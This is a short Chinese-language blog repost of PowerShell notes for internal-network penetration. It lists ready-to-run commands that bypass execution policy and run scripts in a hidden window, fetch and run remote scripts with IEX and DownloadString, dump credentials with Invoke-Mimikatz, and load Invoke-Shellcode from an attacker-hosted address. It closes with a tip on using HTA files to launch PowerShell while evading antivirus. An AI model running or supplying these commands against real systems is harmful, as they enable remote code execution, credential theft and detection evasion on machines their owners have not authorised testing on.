PowerShell
程序员文章站
2023-12-30 17:27:22
...
摘自:《powershell内网***_light》
本地权限绕过
PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
本地隐藏权限绕过执行脚本
PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File xxx.ps1
直接用IEX下载远程的PS1脚本回来权限绕过执行
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
内网***实例
远程代码执行:
IEX (New-Object Net.WebClient).DownloadString(“http://<ip_address>/path/xxx.ps1”)
目标主机‘安装’invoke-shellcode脚本
IEX (New-Object Net.WebClient).DownloadString("http://192.168.146.129/CodeExecution/Invoke--Shellcode.ps1")
查看帮助信息:
Get-Help Invoke-Shellcode
有一段时间了,忽然看见freebuf一篇文章很实用,通过hta来调用powershell(最大特点免杀),很受启发。(文章地址:http://www.freebuf.com/tools/90362.html)
转载于:https://blog.51cto.com/maxvision/1699591